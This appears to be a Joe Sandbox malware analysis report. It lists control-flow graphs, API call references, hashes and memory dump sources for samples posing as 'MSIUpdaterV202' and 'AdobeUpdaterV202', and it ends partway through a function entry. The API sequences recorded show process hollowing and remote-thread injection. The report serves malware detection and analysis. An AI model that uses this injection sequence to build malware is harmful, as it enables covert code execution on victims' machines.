                                                                                                                                              execution_graph 359 d11011 360 d11066 CreateRemoteThread 359->360 362 d110c3 360->362 368 d10e77 371 d10e1c 368->371 369 d10f9b VirtualProtect 370 d10fd8 369->370 371->369 372 d10f2a 371->372 319 d10518 320 d1051d 319->320 324 d10970 320->324 331 d10960 320->331 321 d1085a 339 d10a31 324->339 325 d109a0 326 d10a11 325->326 344 d104f4 325->344 326->321 332 d10970 331->332 338 d10a31 VirtualProtect 332->338 333 d109a0 334 d104f4 VirtualProtect 333->334 337 d10a11 333->337 335 d109e3 334->335 336 d10500 CreateRemoteThread 335->336 335->337 336->337 337->321 338->333 341 d10a36 339->341 340 d10c65 340->325 341->340 342 d10f9b VirtualProtect 341->342 343 d10fd8 342->343 343->325 345 d10f50 VirtualProtect 344->345 347 d109e3 345->347 347->326 348 d10500 347->348 349 d11018 CreateRemoteThread 348->349 351 d110c3 349->351 351->326 352 2732579 358 27325b1 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 352->358 354 273278e WriteProcessMemory 355 27327d3 354->355 356 2732815 WriteProcessMemory Wow64SetThreadContext ResumeThread 355->356 357 27327d8 WriteProcessMemory 355->357 357->355 358->354 363 d104df 364 d104e6 363->364 366 d10970 3 API calls 364->366 367 d10960 3 API calls 364->367 365 d1085a 366->365 367->365

                                                                                                                                              Callgraph

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02732579 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027326E8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027326FB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02732719
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0273273D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02732768
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027327C0
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0273280B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02732849
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02732885
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02732894
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858507920.0000000002732000.00000040.00000800.00020000.00000000.sdmp, Offset: 02732000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2732000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: 1f95302cc5122a641dbd6d1090f444f218f99652d47b494e0c51d493ae95256d
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: AFB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB342D774FA51CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D10A31 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 23 d10a31-d10a34 24 d10a36-d10a3c 23->24 25 d10a4d-d10a64 23->25 28 d10a8c-d10a99 24->28 29 d10a3e-d10a4b 24->29 26 d10c65-d10c6c 25->26 27 d10a6a-d10a6f 25->27 30 d10a71-d10a84 27->30 31 d10aab-d10ab0 27->31 28->31 32 d10a9b-d10aa9 28->32 29->25 30->31 33 d10a86-d10a8a 30->33 34 d10ab7-d10abc 31->34 32->34 33->28 36 d10ac2-d10ad5 34->36 37 d10c6d-d10cd2 34->37 36->37 38 d10adb-d10aec 36->38 45 d10cd5-d10d0c 37->45 38->37 40 d10af2-d10b32 38->40 40->37 49 d10b38-d10b55 40->49 55 d10d12-d10d2f 45->55 56 d10f34-d10fd6 VirtualProtect 45->56 53 d10b5c-d10b77 49->53 53->37 63 d10b7d-d10bbc 53->63 55->56 60 d10d35-d10d53 55->60 68 d10fd8-d10fde 56->68 69 d10fdf-d11000 56->69 60->45 67 d10d55-d10d5d 60->67 63->37 87 d10bc2-d10bd2 63->87 70 d10d60-d10d67 67->70 68->69 72 d10d69-d10d70 70->72 73 d10daf-d10db8 70->73 72->73 75 d10d72-d10d7e 72->75 73->56 76 d10dbe-d10dce 73->76 75->56 79 d10d84-d10d8e 75->79 76->56 77 d10dd4-d10de2 76->77 77->56 80 d10de8-d10df5 77->80 79->56 81 d10d94-d10da3 79->81 80->56 82 d10dfb-d10e0b 80->82 84 d10da5-d10dab 81->84 85 d10dac 81->85 82->70 86 d10e11-d10e19 82->86 84->85 85->73 88 d10e1c-d10e28 86->88 87->37 89 d10bd8-d10be8 87->89 90 d10f1d-d10f24 88->90 91 d10e2e-d10e37 88->91 89->37 92 d10bee-d10bff 89->92 90->88 96 d10f2a-d10f31 90->96 93 d10e40-d10e4f 91->93 94 d10e39-d10e3f 91->94 92->37 95 d10c01-d10c12 92->95 93->56 97 d10e55-d10e61 93->97 94->93 95->37 98 d10c14-d10c27 95->98 99 d10e63-d10e69 97->99 100 d10e6a-d10e85 97->100 98->37 101 d10c29-d10c3a 98->101 99->100 100->56 104 d10e8b-d10e99 100->104 101->37 103 d10c3c-d10c4d 101->103 103->37 105 d10c4f-d10c5f 103->105 104->56 106 d10e9f-d10eac 104->106 105->26 105->27 106->56 107 d10eb2-d10ec2 106->107 107->56 108 d10ec4-d10edc 107->108 109 d10ee6-d10ef1 108->109 110 d10ede-d10ee5 108->110 109->56 111 d10ef3-d10f00 109->111 110->109 111->56 112 d10f02-d10f17 111->112 112->90 112->91
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03733584,?,?,?), ref: 00D10FC9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 544645111-4108050209
                                                                                                                                              • Opcode ID: 2b778dd7d469767f9f81f11ec4f92e2823b606d6257128581114c83bae9b338c
                                                                                                                                              • Instruction ID: fb6554ac0add770a89cd93180cf8ce25742106bb9c36b6d29a9d75f15210da3b
                                                                                                                                              • Opcode Fuzzy Hash: 2b778dd7d469767f9f81f11ec4f92e2823b606d6257128581114c83bae9b338c
                                                                                                                                              • Instruction Fuzzy Hash: 17127A319002559FCB05DFA9C480AEDFFF2AF59310F598595E498AB262CB70EDC1CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D10500 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 113 d10500-d11072 116 d11082-d110c1 CreateRemoteThread 113->116 117 d11074-d11080 113->117 118 d110c3-d110c9 116->118 119 d110ca-d110de 116->119 117->116 118->119
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00D110B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 788fd4cd3ca4f64ffec6eda90f32cf5ddf7cb4d127c233ef3c9aba02266a37bb
                                                                                                                                              • Instruction ID: 1947a97224a38688d2281e00046561d5f5d8084826b6389710efabe7da74d827
                                                                                                                                              • Opcode Fuzzy Hash: 788fd4cd3ca4f64ffec6eda90f32cf5ddf7cb4d127c233ef3c9aba02266a37bb
                                                                                                                                              • Instruction Fuzzy Hash: D23104B5D00249EFCB10CF9AD984ADEBBF5FB48310F208029E918A7350D775A994CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D11011 Relevance: 1.6, APIs: 1, Instructions: 67threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 121 d11011-d11072 123 d11082-d110c1 CreateRemoteThread 121->123 124 d11074-d11080 121->124 125 d110c3-d110c9 123->125 126 d110ca-d110de 123->126 124->123 125->126
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00D110B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 202800d389b836c58898f4ade429c3a6bd252c7d012b2bcdf8171048868d1797
                                                                                                                                              • Instruction ID: cfb22f49291a8afb2bc81f5f32c51cd5821d989905d20de96efd53733877057b
                                                                                                                                              • Opcode Fuzzy Hash: 202800d389b836c58898f4ade429c3a6bd252c7d012b2bcdf8171048868d1797
                                                                                                                                              • Instruction Fuzzy Hash: 0031F2B5900289EFCB10CF99D984ADEBBF1BB48314F208029E959A7250D375A990CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D104F4 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 128 d104f4-d10fd6 VirtualProtect 131 d10fd8-d10fde 128->131 132 d10fdf-d11000 128->132 131->132
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03733584,?,?,?), ref: 00D10FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: a4340eb0180d2935c31212a15fd75bb887d3e09315252665fbd53e644dc35c0d
                                                                                                                                              • Instruction ID: 0e2ccc8b9e5c8d95d59ce72a5384da2b361836f4afe90d595ca1de65bad94ddd
                                                                                                                                              • Opcode Fuzzy Hash: a4340eb0180d2935c31212a15fd75bb887d3e09315252665fbd53e644dc35c0d
                                                                                                                                              • Instruction Fuzzy Hash: 4E21E7B5901219AFCB10DF9AD885BDEFBB4FF08310F10812AE558A7250D7B4A994CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Callgraph

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02C62609 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02C62778
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02C6278B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02C627A9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C627CD
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02C627F8
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02C62850
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02C6289B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C628D9
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02C62915
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02C62924
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974437145.0000000002C62000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C62000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2c62000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: ad82d3f38fd65e8f82cc31928f2a42cb0663f21147878687094c6c87762fa4e6
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: A2B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02A60A31 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 473COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 23 2a60a31-2a60a64 24 2a60c65-2a60c6c 23->24 25 2a60a6a-2a60a6f 23->25 26 2a60a71-2a60a84 25->26 27 2a60aab-2a60ab0 25->27 26->27 28 2a60a86-2a60a99 26->28 31 2a60ab7-2a60abc 27->31 28->27 29 2a60a9b-2a60aa9 28->29 29->31 32 2a60ac2-2a60ad5 31->32 33 2a60c6d-2a60cd2 31->33 32->33 34 2a60adb-2a60aec 32->34 41 2a60cd5-2a60d0c 33->41 34->33 35 2a60af2-2a60b10 34->35 39 2a60b17-2a60b32 35->39 39->33 46 2a60b38-2a60b77 39->46 51 2a60f34-2a60fd6 VirtualProtect 41->51 52 2a60d12-2a60d2f 41->52 46->33 58 2a60b7d-2a60bbc 46->58 60 2a60fdf-2a61000 51->60 61 2a60fd8-2a60fde 51->61 52->51 57 2a60d35-2a60d53 52->57 57->41 64 2a60d55-2a60d5d 57->64 58->33 82 2a60bc2-2a60bd2 58->82 61->60 66 2a60d60-2a60d67 64->66 68 2a60daf-2a60db8 66->68 69 2a60d69-2a60d70 66->69 68->51 70 2a60dbe-2a60dce 68->70 69->68 71 2a60d72-2a60d7e 69->71 70->51 72 2a60dd4-2a60de2 70->72 71->51 74 2a60d84-2a60d8e 71->74 72->51 76 2a60de8-2a60df5 72->76 74->51 75 2a60d94-2a60da3 74->75 77 2a60da5-2a60dab 75->77 78 2a60dac 75->78 76->51 79 2a60dfb-2a60e0b 76->79 77->78 78->68 79->66 81 2a60e11-2a60e19 79->81 83 2a60e1c-2a60e28 81->83 82->33 84 2a60bd8-2a60be8 82->84 85 2a60e2e-2a60e37 83->85 86 2a60f1d-2a60f24 83->86 84->33 87 2a60bee-2a60bff 84->87 89 2a60e40-2a60e4f 85->89 90 2a60e39-2a60e3f 85->90 86->83 88 2a60f2a-2a60f31 86->88 87->33 91 2a60c01-2a60c12 87->91 89->51 93 2a60e55-2a60e61 89->93 90->89 91->33 92 2a60c14-2a60c27 91->92 92->33 94 2a60c29-2a60c3a 92->94 95 2a60e63-2a60e69 93->95 96 2a60e6a-2a60e85 93->96 94->33 98 2a60c3c-2a60c4d 94->98 95->96 96->51 99 2a60e8b-2a60e99 96->99 98->33 100 2a60c4f-2a60c5f 98->100 99->51 101 2a60e9f-2a60eac 99->101 100->24 100->25 101->51 102 2a60eb2-2a60ec2 101->102 102->51 103 2a60ec4-2a60edc 102->103 104 2a60ee6-2a60ef1 103->104 105 2a60ede-2a60ee5 103->105 104->51 106 2a60ef3-2a60f00 104->106 105->104 106->51 107 2a60f02-2a60f17 106->107 107->85 107->86
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 95a84aaa5736c2d639be0550cb87fa331d2a921abe0953e96403bedb05cb9f32
                                                                                                                                              • Instruction ID: eff619e2a576bfa72e605d914d5dac78847e296e1d6e3d506b1ab6c18c0a7dc1
                                                                                                                                              • Opcode Fuzzy Hash: 95a84aaa5736c2d639be0550cb87fa331d2a921abe0953e96403bedb05cb9f32
                                                                                                                                              • Instruction Fuzzy Hash: 77127C31A002958FCB05CFA9C484AADFFB2BF49314F59C595E498AB252CB30FD85CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02A604DF Relevance: 2.0, APIs: 1, Instructions: 481memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 108 2a604df-2a604e4 109 2a604e6-2a60fd6 VirtualProtect 108->109 110 2a60544-2a6084e 108->110 118 2a60fdf-2a61000 109->118 119 2a60fd8-2a60fde 109->119 111 2a60850-2a60852 110->111 112 2a60878-2a608bb 110->112 124 2a60854 call 2a60960 111->124 125 2a60854 call 2a60970 111->125 116 2a6085a 119->118 124->116 125->116
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03C63584,?,?,?), ref: 02A60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: fca98933b1499005337ef9b7b0b17c3fb8b2d7bce928524d371618610e3f2380
                                                                                                                                              • Instruction ID: e557ed4e62027f9a1c03b63386275869f85d335a4522c8f946b0931fab94a87f
                                                                                                                                              • Opcode Fuzzy Hash: fca98933b1499005337ef9b7b0b17c3fb8b2d7bce928524d371618610e3f2380
                                                                                                                                              • Instruction Fuzzy Hash: 5441ADB1D052889FCB01DFA9D9946EEFFF0FF49310F1480AAE488A7251D7749949CBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02A60500 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 126 2a60500-2a61072 129 2a61074-2a61080 126->129 130 2a61082-2a610c1 CreateRemoteThread 126->130 129->130 131 2a610c3-2a610c9 130->131 132 2a610ca-2a610de 130->132 131->132
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 02A610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 5682bc69776fd96827a881230b062dcf7d28dc59f1eab5a797962d55526ecf46
                                                                                                                                              • Instruction ID: a01a72e47247ad643428e1b88ae49f9aabc54fb69f00d7f546c0d3629f7b9933
                                                                                                                                              • Opcode Fuzzy Hash: 5682bc69776fd96827a881230b062dcf7d28dc59f1eab5a797962d55526ecf46
                                                                                                                                              • Instruction Fuzzy Hash: 9F31D3B5900289DFCF10CF9AD984ADEBBF4FB48314F10802AE959A7350D775A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02A61011 Relevance: 1.6, APIs: 1, Instructions: 67threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 134 2a61011-2a61072 136 2a61074-2a61080 134->136 137 2a61082-2a610c1 CreateRemoteThread 134->137 136->137 138 2a610c3-2a610c9 137->138 139 2a610ca-2a610de 137->139 138->139
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 02A610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 3c9e5e988de49738e4726ac80c27d7c41958d0b0a4c94bbf00c7e99dd35a1e44
                                                                                                                                              • Instruction ID: a8fd3e596ec27919979f3e153af5241bb0b425767bd57a2afe55d8143e7b349a
                                                                                                                                              • Opcode Fuzzy Hash: 3c9e5e988de49738e4726ac80c27d7c41958d0b0a4c94bbf00c7e99dd35a1e44
                                                                                                                                              • Instruction Fuzzy Hash: 1331E0B59012899FCF10CFA9D984AEEBFF1FB48314F208029E958A7210D375A950CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02A604F4 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 141 2a604f4-2a60fd6 VirtualProtect 144 2a60fdf-2a61000 141->144 145 2a60fd8-2a60fde 141->145 145->144
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03C63584,?,?,?), ref: 02A60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 46cde1b0fc57fa7561fbec23d652820171f226c42e7da53e3f10446e5387c49d
                                                                                                                                              • Instruction ID: d9877674eaaab056ff2bebbd1229fa25da20d06598b42304ba0b5ab7f4c6d270
                                                                                                                                              • Opcode Fuzzy Hash: 46cde1b0fc57fa7561fbec23d652820171f226c42e7da53e3f10446e5387c49d
                                                                                                                                              • Instruction Fuzzy Hash: F22118B1901219DFCB00CF9AC884BDEFBF4FB08310F10812AE558A7240D374A954CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Callgraph

                                                                                                                                              Executed Functions

                                                                                                                                              Function 03352609 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 03352778
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0335278B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 033527A9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033527CD
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 033527F8
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 03352850
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0335289B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033528D9
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 03352915
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 03352924
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2056135649.0000000003352000.00000040.00000800.00020000.00000000.sdmp, Offset: 03352000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_3352000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: d38469f3e7ada88b98162843e1e4196d02fa2fce5612c33ceff1c6b2beb4802e
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: 23B1E77660024AAFDB60CF68CC80BDA77A9FF88714F158564EA0CEB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01590A31 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 475COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
